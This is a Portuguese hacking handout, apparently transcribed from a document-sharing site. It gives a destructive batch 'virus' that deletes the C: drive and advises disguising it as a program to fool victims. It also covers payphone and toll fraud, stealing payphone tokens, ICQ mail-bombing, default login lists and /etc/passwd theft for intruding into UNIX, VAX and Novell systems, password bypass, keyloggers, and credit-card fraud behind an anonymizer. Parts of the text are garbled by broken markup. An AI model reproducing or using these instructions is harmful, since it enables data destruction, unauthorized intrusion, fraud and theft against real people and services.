apostila - burlando celular

20
Hackers: O que é um Hacker ? Tudo isto que vocês pensam dos Hackers foi criado possivelmente com a publicidade gerada pelos filmes que tratam do assunto, como: Jogos de Guerra e agora com os mais recentes A rede e Hackers. Esses filmes colocam o hacking de uma forma absurda. Pois o é quase impossivel fazer o que eles fazem. E isso faz com que a pessoa pense que os hacker são criminosos perigosos. São aqueles possuem muitos, senão todos, os conhecimentos acima! Isso não é uma regra, mas não usam para os mesmos propósitos e as vezes auxiliam os próprios técnicos em segurança e os webmasters a proteger seus sistemas. São de uma inteligência e determinação muito superiores a de uma pessoas comuns, pois eles são capazes de passarem semanas ou até mesmo meses lendo e aprendendo de um novo sistema, apenas com o propósito de saber e utilizar esses sistemas. Compram livros sobre os assuntos que procuram aprender. Um Hacker, é um sabichão. Justamente por saber muito, ele tem condições de "aprontar" por aí. O Hacker sempre quer aprender mais um pouco e normalmente acaba perdendo horas de sono por isso. É aquele que tem prazer em sentar em frente de seu micro e ficar horas e horas buscando aquilo que precisa. Naturalmente xereta, o Hacker adora invadir sistemas alheios para simplesmente preencher seu ego. Muitas de suas façanhas podem ser discutíveis ao nível social, mas o verdadeiro Hacker não costuma estragar nada, subtrair programas, ou sequer roubar informações em detrimento de outrem. O Hacker é, acima de tudo, um intelectual informatizado. O que Hacking ? Hacking é o ato de penetrar em sistemas de computadores para ganhar mais conhecimento e entender como é seu

Upload: pedralhada

Post on 11-Feb-2016

10 views

Category:

Documents


0 download

DESCRIPTION

apostila

TRANSCRIPT

Page 1: Apostila - Burlando Celular

Hackers:O que é um Hacker ? Tudo isto que vocês pensam dos Hackers foi criado possivelmente com a publicidade gerada pelos filmes que tratam do assunto, como: Jogos de Guerra e agora com os mais recentes A rede e Hackers. Esses filmes colocam o hacking de uma forma absurda. Pois o é quase impossivel fazer o que eles fazem. E isso faz com que a pessoa pense que os hacker são criminosos perigosos.

São aqueles possuem muitos, senão todos, os conhecimentos acima! Isso não é uma regra, mas não usam para os mesmos propósitos e as vezes auxiliam os próprios técnicos em segurança e os webmasters a proteger seus sistemas.

São de uma inteligência e determinação muito superiores a de uma pessoas comuns, pois eles são capazes de passarem semanas ou até mesmo meses lendo e aprendendo de um novo sistema, apenas com o propósito de saber e utilizar esses sistemas. Compram livros sobre os assuntos que procuram aprender.

Um Hacker, é um sabichão. Justamente por saber muito, ele tem condições de "aprontar" por aí. O Hacker sempre quer aprender mais um pouco e normalmente acaba perdendo horas de sono por isso. É aquele que tem prazer em sentar em frente de seu micro e ficar horas e horas buscando aquilo que precisa.

Naturalmente xereta, o Hacker adora invadir sistemas alheios para simplesmente preencher seu ego. Muitas de suas façanhas podem ser discutíveis ao nível social, mas o verdadeiro Hacker não costuma estragar nada, subtrair programas, ou sequer roubar informações em detrimento de outrem. O Hacker é, acima de tudo, um intelectual informatizado.

O que Hacking ?

Hacking é o ato de penetrar em sistemas de computadores para ganhar mais conhecimento e entender como é seu funcionamento. Em português hack significa corte, entalhe. Ou então fuçador.

Por quê Hack ?

Como já foi dito anteriormente, o hack é feito para a aprimorar os conhecimentos de uma pessoa em relação a um sistema de computadores. Hackers não destroem, não roubam e nem espionam informações por dinheiro.

Diferença entre Hackers e Crackers ?

Os Crackers são os que a imprensa confunde com os hackers, são aqueles que invadem sistemas com o propósito de roubar programas ou simplesmente apagá-los, são inteligentes, porém, em sua maioria, prepotentes, pois deixam mensagens do tipo: "Eu sou o melhor ! Apaguei e escapei !"entre outras, deixando na maioria das vezes um rastro que possibilita sua captura. Possuem co- nhecimentos semelhantes aos phreaks mais com propósitos um pouco mais destrutivos. Um exemplo recente foi a prisão de

Page 2: Apostila - Burlando Celular

Kevin Mitnick, o "ladrão(?) cibernético mais procurado da história, capturado pelo FBI com a ajuda do Tsutomu Shimomura, o técnico de segurança mais respeitado da história (?).

Um Cracker é o que utiliza de suas habilidades em proveito próprio, não importando quantos ou quais prejuízos vai causar. Este é um elemento perigoso, que muitas vezes acaba por se auto-destruir. Normalmente coloca vírus em computadores, descobre senhas para vender a empresas, destrói informações, corrompe sistemas e apronta tudo que pode

Regras Hackers:

<STRONGɭ- Nunca destruir nenhum sistema. < strong>

<STRONGɮ- Nunca nenhum < strong alterar dos arquivos do sistema, não ser que seja necessrio para esconder presença ou garantir a sua entrada posteriormente.>

<STRONGɯ- < strong Não compartilhe seus projetos hackers, com ninguém>

<STRONGɰ- < strong não ser que seus projetos Em uma BBS, é aconselhvel você discuta hackers. BBS?s podem monitoradas pelo governo.>

<STRONGɱ- Nunca < strong ou uma dê nomes telefones reais em BBS.>

<STRONGɲ- Nunca < strong que você em deixe seu apelido um sistema entrou.>

<STRONGɳ- < strong Não em entre computadores governamentais.>

<STRONGɴ- Nunca < strong do sua seus com converse sobre planos hackers outra pessoa telefone de casa.>

<STRONGɵ- < strong em seu um Seja atento. Mantenha todo o material hacker lugar seguro.>

<STRONGᡂ- < strong você um hacker Para se tornar verdadeiro deve simplesmente praticar.>

Por onde começar ?

Começe com sistemas pequenos como em universidades. Depois passe para redes maiores como telenet. A telenet é altamente recomendada para novatos, pois ela tem um sistema de segurança muito vago. São milhares de conexões ao mesmo tempo, o que torna praticamente impossível a monitoração de um usurário no caso, você !

Como Criar Vírus: 

Page 3: Apostila - Burlando Celular

Nesta seção do o CALOI, você vai aprender a fazer um vírus muito facilmente. Ele é feito no Edit do DOS e o procedimento será muito simples... Fazendo o Vírus

Para fazer, entre no Edit do DOS e crie um arquivo .bat e neste arquivo digite:

ECHO ECHO OFF ECHO Y | del c:\*.* cls ECHO já era otario!!! Seu c: nao existe mais!

Depois de digitar salve o arquivo e logo em seguida, você vai precisar de um compilador de arquivos de .bat para .exe porque no Edit, ele vai salvar o vírus como .bat !! Se o cara rodar o arquivo .bat, o vírus funciona do mesmo jeito mas se ele estiver em .exe você pode dar uma desculpa dizendo que é algum programa e quando o cara rodar, ele se fode !!!

Importante: Se o windows do cara for na versão em português, mude o "Y" para "S".

Descrição dos comandos:

ECHO OFF => Apaga as linhas do comando ECHO Y | del c:\*.* => Deleta o c:\*.* cls => Limpar ECHO já era otario!!! Seu c: nao existe mais! => Mensagem que vai aparecer quando ele rodar o arquivo...

 

Phreaker: 

BURLANDO CELULARES • Esta dica é muito boa, é uma dica para celulares, mas tenho uma ligeira pretenção que em telefones comuns ele chegue a reduzir em 70% a tarifa telefonica (Só que não é garantido). Para isso basta que você pegue o numero a ser discado, exemplo: 65 - 93 - 42 (um numero inventado), você pega o último digito e o subtrai de dez, no caso do exemplo o 2. 10 - 2 = 8, então, coloque o 8 na frente do 2 que ficará assim: 65 93 48 2 , agora sem pagar.

• Primeiro, pegue o número que você vai discar.

Exemplo: 123-4567

Devemos pegar o ultimo número do telefone a ser discado, no caso o 7... Subtraimos ele de 10, o que vai resultar o numero 3. Somente vamos acrescentar o número 3 ao final do numero discado. O resultado vai ficar: 123-4567-3

LIGANDO EM ORELHÕES À CARTÃO SEM PAGAR

Truque com o cartão:

• Enganando o telefone publico

Page 4: Apostila - Burlando Celular

· Bote o cartão , assim que a pessoa falar ALOW! segure o numero 9 e retire o cartão, fique segurando o numero 9 até acabar de falar!

• Grafite

· O grafite é um material super condutor que conduz energia, e o cartão funciona assim, ele tem uns 50 fuziveiszinhos, cada ligação gasta ele queima um fuzivel, então o nosso amigo grafite que é condutor de eletricidade, não deixa queimar os fuziveis então faça o seguinte atras do cartão,(na parte cinza) rabisque-a com força e ,bote no telefone publico e pronto ,mas lembre-se rabisque com força!

• Esmalte de unha incolor

· O esmalte impede que esses fuziveis queimem, faça também esse com os cartoes de video game(divertilandia)! Passe esmalte na parte de traz do cartão ,e no de video game passe na parte da fita magnética! Se você sabe mais uma dica mande para mim! pode ter seu nome e seu e-mail aqui!

· Pegue o cartão telefonico zerado dai bote ele de molho na água candida (com sal ou pode se comprar em uma farmácia qualquer), depois de 3 ou 4 dias a tinta do cartão vai sair , depois pegue papel aluminio e cubra as partes metalicas com o papel alumi , dai as ligaçoes virarão infinitas!

· Esta dica pode lhe poupar algumas fichas. Antes de mais nada é bom lembrar que esta dica é para aqueles telefones antigos (os vermellhos). Vamos a dica. Pense em um numero qualquer ex, 65 9342 (Se você leu a dica anterior deve se lembrar), então você devera subtrair cada digito de 10. No caso vai ficar 45 1768. Agora tecle o numero e bata no bocal do telefone o numero de vezes de acordo com o novo numero. Então você tera ligações gratutas. · Tem muita revista por ai falando sobre isso, mas nada do que eles poe na revista funciona! Ai vai uma que e testada e aprovada, funciona mesmo!

É bem simples, qualquer orelhao a cartao aceita isso:

<STRONGɭ- < strong do a pessoa o Ponha cartao ligue normalmente 2- Quando atender aperte 0 (zero) e segure. 3- Pronto agora suas fichas (unidades cartao) nao vao cair mais!>

OBS: Nao solte o dedo do zero se não as fichas vão voltar a cair.

· Esta dica é para você poder discar de um telefone sem usar as teclas. Por exemplo, assim você vai poder ligar de um telefone com cadiado ou mesmo se as teclas do seu quebraram hehehe. Bem então mãos a obras, pra você "discar" sem usar as teclas é muito simples basta que você pegue aqueles trecos que indentificam se o telefone está fora ou não do gancho. Bom agora basta que você pressione o negócio de acordo com o digito por exemplo, se o digito for 2 aperte rapidamente duas vezes. Se for 3 aperte três vezes e assim vai... A cada numero de um pequeno intervalo para que ele reconheça o numero. Mas porque isso ocorre?! Bem cada vez que você tira o telefone do gancho ele libera um impulso telefonico, estes impulsos são aqueles barulinhos que você escuta quando teclar qualquer coisa. Então ao pressionar o gancho vai se seguir o mesmo

Page 5: Apostila - Burlando Celular

principio, portanto você tem que pressionar determinadas vezes de acordo com o numero.

· Isto aqui vai lhe poupar uma nota, mas aconselho a você não fazer testes em vão, pois se não funcionar... hehehehe, vc vai pagar uma nota preta! Bem o numero que seria discado normalmente seria: 316 433 9418, como é pro EUA você digitaria 01 na frente (Codigo Internacional do EUA) o numero passa a ser 01 316 433 9418 (Ainda não disque!) bem oque agente vai fazer é enganar o computador da EMBRATEL, para isso você vai digitar 0008 antes. Digite rapidamente 0008 01 316 433 9418. Ao digitar o 1º zero você estará iniciando um codigo de um pais normalmente, quando você digita o 2º zero o computador vai iniciar uma busca pelo codigo e vai descobrir que o número não existe então antes que dê mensagem de erro digite o terceiro zero a esta altura os computadores vão se complicar com os três zeros que você digitou e ficaram loucos, ao digitar o oito você mostra aos computadores (que estão mais loucos do que qualquer coisa) que quer fazer uma ligação internacional então o 01 dará o codigo internacional a ser discado, como pode ser qualquer outro, e o nº é o destino do telefonema. Se der certo você vai pagar apenas o impulso normal.

· Faca a ligacao com o numero desejado!

Ex: 555-6766

para discar o

<STRONGɱ < strong aperte (aperte 5 cinco 7 sete botao) 6 ( seis vezes aquele botao )>

Você deve estar se perguntando, mas se tiver um zero como eu faço? Perg: Não aperto nada? Resp: Não, aperte dez vezes aquele botao! ; Þ

Obs: Tem que ter um intervalo de 1 a 2 segundos entre os apertos!

Obs2: "aquele botão" é o botão do gancho, onde voce desliga!

 

SE NA SUA CIDADE AINDA EXISTIR TEL. COM FICHAS!!

· Ligando sem fichas Você coloca sal humido no bocal das fichas e empurra com uma licha de unhas espera um 2 ou cinco minutos e pumba.

· Roubando fichas primeiro metodo Você coloca no lugar das fichas uma chapinha daquelas que dobram para dentro nas latas de refrigerante. Você espera um dia no outro vc vai no orelhaum com uma licha de unhas e começa a forçar a chapinha para baixo com ela "zan" vai cair tro-centas fichas.

· Roubando fichas segundo metodo Você pega um arame daqueles bem groços e entorta ele depois coloca ele por debaixo do arelhaum de modo que ele entre peloburaco aonde sai as fichas "plim" começa a cair todas as fichas do orelhaum.

Page 6: Apostila - Burlando Celular

Atacando o ICQ: 

Usando seu mailbomber para bombear o ICQ : O icq permite que você possa mandar e-mails para outros usuários. Então vamos aproveitar disso para bombardear um outro usuário um mailbomb. O mailbomb manda diversas mensagens para o e-mail da vitima, isso é exatamente o que vamos fazer!! Enviar um monte de mensagens para o icq de um usuário. Tudo que você vai precisar é de um programa de mail bomb e o UIN ( n° do icq ) da vitima mas não é necessario que você tenha essa pessoa na sua lista. Coloque seu e-mail bomb para bombear... Isso é bem simples. "Uin da ví[email protected]"

Exemplo: [email protected]

O cara vai ser bombeado exatamente como faz um mail bomb !! Na verdade essa tecnica faz exatamente o que faz o "icq bomber" faz. Porém, talvez seja mais rápido... ( Bem melhor )

Proteção contra ataques do ICQ: 

Uma das coisas mais úteis na internet talvez seja o icq. O programa é quase que fundamental. Um dos problemas do programa é você estar conversando na boa e de repente você recebe milhares de mensagens !! Isso é muita pentelhação, porém existem modos de se defender dos floods. Alguns desses modos você encontrará nesse texto abaixo.

Flooding :

O primeiro programa brasileiro a floodear um usuario usando o sistema random user do icq foi o flooder. Esse programa faz um ataque de cliente a cliente, ou seja, de você ao usuário a ser bombeado. Para isso ele terá que se conectar a uma porta do seu computador. A porta padrão do ICQ é a 1027. Na maioria das vezes ela está aberta e o usuário é bombeado a partir dela.

O que iremos fazer para nos defendermos dos ataques dos flooders é travar o acesso dessas portas. Para isso iremos usar uma firewall. Firewall (parede de fogo) é um programa que impede qualquer conecção com portas selecionadas.

Arranje a firewall e instale. Agora abra a firewall e vá na seção Rule list. E clique em add. Uma nova janela se abrirá, agora você tem que selecionar as portas que você deseja colocar a firewall.

Aqui vai como deverá ficar suas opções: (as opções com "º" são pra voce selecionar)

Page 7: Apostila - Burlando Celular

Visualização das configurações do programa:

ºAll IP adress

|--RULE TYPE--| |----LOCAL PORT SELECTION-----|

|Allow in| |all ports| |allow out| |single port| |ºdisallow in| |ºports from "1000" to "7000"| |disallow out|

---------------------------------------------------------------

|--PROTOCOL--| |----REMOTE PORT SELECTION----|

|ºtcp/ip| |all port| |udp| |single port| ---------- |ºports from "1000" to "7000"|

---------------------------------------------------------------

Visulização das configurações do programa :

Configure um novo rule list assim e pronto! Você não receberá mais aqueles montes de mensagens pentelhas do flooder e do ickiller!

Mail bombing :

Para se defender desse problema é muito fácil! O mailbombing de icq utiliza um sistema chamado mailexpress. Quando te bombardeiam, você recebe várias mensagens de e-mail de icq, então nós iremos cancelar o recebimento desse tipo de mensagens.

Para isso abra o ICQ, vá no menu e então em security & privacity.

Uma nova janela irá se abrir. Entre na seção de ignore list e selecione a opção: "Do not accept mailexpress messages". E salve as alterações.

Pronto! Você nunca mais será bombeado dessa maneira. Quando as pessoas irem em seu info, não aparecerá mas o seu IP.

 

Encontrando sistemas: 

Encontrando o Sistema Para encontrar um computador com o sistema, você deve procurar pelas linhas com um programa chamado War Dialer, ou se conectar via Telnet ou outro sistema de interligação de computadores. War Dialer: VMB Hacker (40,7k)

Sistemas UNIX

Page 8: Apostila - Burlando Celular

<STRONGɭ. < strong sistema, que a com você um sistema de Para deve e 6 Entrando no entrar ?login?, 1 dígitos password pode ter 8 dígitos. Dai tem três saídas:>

<STRONGɭ. a com um de hacker Arrumar lista passwords 2. Tentar entrar com os defaults 3. Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde.Defaults são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo.

Login: ..Password: root ....root root ....system sys .....sys sys .....system daemon ..daemon uucp ....uucp tty .....tty test ....test unix ....unix unix ....test bin .....bin adm .....adm adm .....admin admin ...adm admin ...admin sysman ..sysman sysman ..sys sysman ..system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who .....who learn ...learn uuhost ..uuhost guest ...guest host ....host nuucp ...nuucp rje .....rje games ...games games ...player sysop ...sysop root ....sysop demo ....demo

<STRONGɮ. < strong do sistema, que ou a é você de o deve lista sistema: Dentro primeira coisa fazer copiar arquivo da passwords. Ele está em: etc passwd. Nesse

Page 9: Apostila - Burlando Celular

arquivo, vai encontrar as informações na seguinte sintaxe: username:password:UserID:GroupID:descrição nome:homedir:shell>

Ex.: fou:123abc45:6789:10:RicardoGomes:/home/dir/fou:/bin/fou Username: fou Encrypted Password: 123abc45 User Number: 6789Group Number: 10 Other Information: Ricardo Gomes Home Directory: /home/dir/fou Shell: /bin/fou

Esse arquivo muito provávelmente estará encriptado. O password estará escondido e, sem um programa para decriptá-la, a lista será inútil. O programa de decriptação do password UNIX, trabalha em cima de um .dicionário pré moldado, comparando as palavras com o texto encriptado. É bom lembrar que o Brute Force não irá decriptar a lista. Ele irá tentar comparar palavras encriptadas por uma lista de nomes com a lista de passwords. Quando ele encontrar semelhanças (ex. duas palavras iguais com a mesma decriptação) ele para e dá a lista pronta. Brute Force (14,4k) Dictionary Maker (7,73k)

Antes de usar o programa decriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema.

Ex.: fou::6789:10: Ricardo Gomes:/home/dir/fou:/bin/fou

Depois da lista de passwords, pegue os seguintes arquivos: /etc/group - É a lista de newsgroups e seus passwords também encriptados. sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telenet ou rlogin. /usr/mail/ - É onde estão guardadas as mensagens de cada usuário.

Sistema VAX/VMS

Para entrar no sistema VAX/VMS, você deve proceder da mesma maneira que fez no UNIX: Arrume a lista de passwords, entre com o login de alguém ou tente os defaults

Username: ..Password: system .....operator system .....manager system .....system system .....syslib operator ...operator systets ....uetp systest ....systest systest ....test sysmaint ...sysmaint sysmaint ...service sysmaint ...digital field ......field

Page 10: Apostila - Burlando Celular

field ......service guest ......guest guest ......sem password demo .......demo demo .......sem password test .......test decnet .....decnet

Dentro do sistema não há muito o que fazer. Você pode tentar pegar a lista de passwords em:SYS$SYSTEM:SYSUAF.DAT, mas normalmente, ela não está disponível para os usuários Tome muito cuidado quando tentar quebrar o sistema VAX's, pois ele guarda todos os bad logins e bad passwords, podendo rastreá-lo na sua próxima tentativa. Se você quiser mesmo tentar, entre com alguns passwords em um dia, espere e tente novamente no dia seguinte...

Sistema PRIME

Ao entrar no sistema PRIME você deverá fazer as mesmas coisas que fez no UNIX e no VAX's.

Username: ..Password: prime ......prime primos .....primos primos .....prime primos_cs ..prime primos_cs ..primos primenet ...primenet system .....system system .....prime system .....primos netlink ....netlink test .......test guest ......guest guest1 .....guest

Rede Novell 1. Entrando no Sistema - Para quebrar a rede Novell você deve utilizar os mesmos recursos que usou para entrar nos sistemas UNIX ou VAX's. Na Novell você também pode tentar alguns defaults. Os defaults da rede Novell são usados para a conexão com portas externas como impressoras, fax e etc..., todos sem password. Abaixo estão alguns defaults:

Login: superior guest admin user_template print laser

Page 11: Apostila - Burlando Celular

hp_laser printer laserwriter post mail gateway gate router backup wangtek fax faxuser faxworks test archivistchey_archsvr windows_passthru

Se você conseguir entrar com esses defaults, você pode conseguir a lista com os logins verdadeiros fazendo o seguinte: vá ao diretório SYS:PUBLIC, digite SYSCON e dê enter. Então vá a User Information e veja a lista com todos os logins desse servidor. Esses logins só poderão ser utilizados se estiverem sem password, pois a lista só mostra os nomes. Nunca tente chutar o password de um usuário, pois o computador armazena o numero de vezes que uma senha foi digitada errada e manda para o usuário verdadeiro quando ele se conecta. Esse sistema de segurança se chama Intruder Detection. Se você não conseguir entrar com esses logins, faça o seguinte: no prompt do DOS digite NETX ou VLM, para rodar a rede TSRs e escreva CX /T /A /R. Com isso você, provavelmente conseguirá a lista dos usuários.

<STRONGɮ. dos do que para ou com uma é você seu um sistema de o Para e no password pode tem

<STRONGɯ. dos com uma é você de o Para deve super.zip (31,3k) Esse programa foi escrito exatamente para deixar o usuário desligar e ligar o acesso Supervisor na hora que quiser. Faça então o seguinte:Consiga aceso Supervisor com o nw-hacker; Ligue sua conta para supe equivalency com o super.exe; Se você ganhar acesso Supervisor, dê supe equivalency a algum dos defaults (Guest, test, archivist, chey_archsvr...); Saia e entre na rede com o default que você deu a supe equivalency e ligue o acesso Supervisor com o super.exe; Saia e entre novamente com o login que você utilizou primeiro; Remova o acesso Supervisor. Agora o default que você escolheu pode ser ligado e desligado por você, na hora que você quiser para ter acesso Supervisor

Passwords Se não houver outro jeito e você precisar chutar os passwords, chute com inteligência e não vá começando: aaa, aab, aac, aad e etc. Os passwords mais utilizados aqui no Brasil são:

Page 12: Apostila - Burlando Celular

Times de futebol; Telefone; Sobrenome; Nome de computadores (pentium, ibm, etc são encontrados com frequência); Apelidos; Nome de pessoas famosas; Passwords de teclas seguidas. Ex.: qwerty, asdfgh, zxcvbn ou aaa, bbb, ccc. O usuário que usa desse tipo de password não pensam hackers quebrando sua senha e sim na velocidade para dar login. Por isso, quando você escolher seu password, faça uma mesclagem de letras e números. Ex. mouse/1997 - m1o9u9s7e. Parece óbvio, mas ninguém vai chutar um password desse tipo quando tentar quebrar seu login.

E-mail Nesta sessão você encontrará arquivos para enviar e-mails bombs, e-mail sem remetente e os famosos PGPs. Unabomb (59,9k) Para bombear o e-mail de alguém. Upyours 3.0 (+-2Mb) Link para o melhor programa de e-mail bomb Anonimail (71,3k) Para enviar e-mails anônimos AEgis Shell for PGP (2,6Mb) Link para um dos melhores programas de encriptação

Se você quiser enviar um E-Mail para Usenet, mande a mensagem para @, por exemplo. Grupo: fou.morais Gateway: news.demon.co.uk Endereço: [email protected] Abaixo está uma lista com alguns gateways:[email protected] [email protected] [email protected] [email protected] [email protected] Para escrever essa sessão, foram tomados como base os seguintes documentos: The PC Hacking FAQ Por: Olcay Cirit BASIC NETWORKING Por: Sk8 The SkinHead alt.2600 FAQ, Beta 013 Por: Vários Autores

Quebra de Password em Geral: 

Bios Password Para quebrar o password do BIOS você pode encontrar duas situações:

<STRONGɭ- < strong que você um o password use Se pegar computador depois foi passado corretamente, desses programas: amipsw.com (230b) ami.com (555b) aw.com (1,83k) amidecod.com (1,79k)>

<STRONGɮ- < strong ou você o Se pegar computador desligado esquecer password:>

- Ligue o micro e entre o setup; - Anote TODOS os dados em um papel; - Desligue e abra a CPU; - Ache uma bateria na motherboard e retire-a; - Espere uns 20 minutos e

Page 13: Apostila - Burlando Celular

recoloque a bateria; - Ligue o micro novamente e entre no setup; - Re-configure todos os dados que você anotou. Password do Windows

Para quebrar o password do Windows 3.x

Você deve digitar"ctrl+alt+del" e depois "enter" quando aparecer a caixa de verificação. Depois que você passou o password, edite o arquivo win.ini e apague as linhas "load=" e "run=".

Para quebrar o password no WIN95:

<STRONGɭ do que a em sistema de o simplesmente e password lista arquivo vai as na Se aparecer Password Logon, cancel entrar. 2 caixa verificação for Windows Password, digite?ctrl+alt+del?, escolha janela aparecerá clique ?End Task?. Com passado, edite win.ini apague linhas ?load=" e " run=".

Screen Saver Password

Para retirar o password de Screen Saver do Windows 3.x você deve editar o arquivo control.ini, apagando tudo o que tiver na area do password. Para retirar o password do Screen Saver do WIN95, renomeie todos os arquivos de extensão .pwl do diretório do windows. Anote os nomes alterados em um papel para eventuais problemas.

Proteção de Documentos Word Para retirar a proteção dos documentos do word use esse programa: wfwcd.zip (19,8k)

Password do ZIP

Para quebrar o password de arquivos ZIP use esse programa: zipcrack.zip (12,3k)

Password do ARJ

Para quebrar o password de arquivos ARJ use esse programa: brkarj10.zip (13,1k)

Copiando Digitações

Para copiar teclas digitadas de um micro como passwords ou logins use um desses programas: keycopy.zip - DOS - (3,31k) keytrap.zip - WIN95 - (36,0k)

Hexadecimal

Para quebrar alguns pogramas, passwords ou códigos de entrada, é bom que você tenha em mãos um bom programa editor de hexadecimal. Ele tamb;em é utilizado para remover os numeros seriais de programas como ACDSee 9.0 e etc... Hex Workshop 32bits (375k)

Escondendo Informações

Para esconder informações ou até pequenos arquivos em arquivos de imagem do tipo .GIF (Compuserve), use esse programa: Hide and Seek v. 4.1 (82,5k)

Page 14: Apostila - Burlando Celular

 

Site de Sexo Sem Pagar: 

Obtendo acesso gratuito a sites de sexo: Ultimamente, conseguir umas boas fotos XXX via WWW está muito difícil. A venda de material pornográfico (fotos, vídeos, show de strip...) se tornou um negócio muito lucrativo e muitos webmaster já estão explorando este novo meio de fazer dinheiro. Mas, na minha opinião, estes sites deveriam ser livres, ou seja, como programas sharewares: se você gostar do serviço paga uma quantia pré estipulada pelo administrador do sistema. Mas como nem tudo é perfeito devemos apelar. Conseguir acesso gratuito a estes sites pagos não é muito difícil e não requer nenhuma habilidade.

<STRONGɭ° < strong não ser que a com é um de o se e vai servidor acesso Passo: Primeiramente preciso escolher maneira tipo fraudado. Existem dois servidores: difíceis obter acesso, menos arriscados) instantâneo (mais fáceis, porém, bem mais arriscados). Qualquer destes tipos servidores envolve fraude números cartões crédito.>

No primeiro tipo de servidor, o esquema é fazer tentativas com diversos números de cc's até que o servidor aceite um destes números. É um método bastante entediante mas a maioria dos sites pornográficos funciona desta maneira. Em alguns, ainda, você se cadastra e só depois de alguns dias é que chega a resposta de seu pedido, resposta esta quase sempre negativa pois são pessoas que verificam a autenticidade do cartão de crédito.

No segundo tipo de servidor o negócio fica mais interessante. A maioria dos sites com acesso instantâneo grava o endereço ip das pessoas que se cadastram, com isso é possível saber da onde vem aquele ou este fraudador. Se você se cadastrar com um número de cartão falso, o site faz uma pesquisa, descobre o seu provedor de acesso e entra em contato com ele na mesma hora, detonando você direitinho. O único jeito seria você trocar o seu endereço ip, o que é perfeitamente possível.

Existe um serviço perfeito com esta função: ANONYMIZER. Neste site é possível que você troque o seu ip por um outro qualquer, deste modo, você navega por páginas WWW com um ip emprestado. Se você quiser fazer um teste, abra essa URL do site Amateurs Hardcore (www.amateurs. com). Vá até a página de cadastro instantâneo, preencha os campos com dados falsos (inclusive o seu e-mail) e, onde aparecem campos pedindo número de cartão de crédito, data de validade, tipo..., preencha com os dados fornecidos por um dos programas geradores de números de CC's.

Após escolher a sua senha e o seu username, você está pronto para fazer o download de várias fotos e vídeos XXX.

Importante:

Nunca use a sua senha falsa mais de duas vezes, é muito arriscado.

Page 15: Apostila - Burlando Celular

Nunca visite o site fraudado sem antes passar pelo anonymiser.

O método não é 100% seguro, o site fraudado pode pedir os logs do anonymiser e descobrir você.

Fraude envolvendo cartões de crédito constituem crime federal e se você for menor de idade, seus pais pagarão por você.

Todo o risco é por sua conta.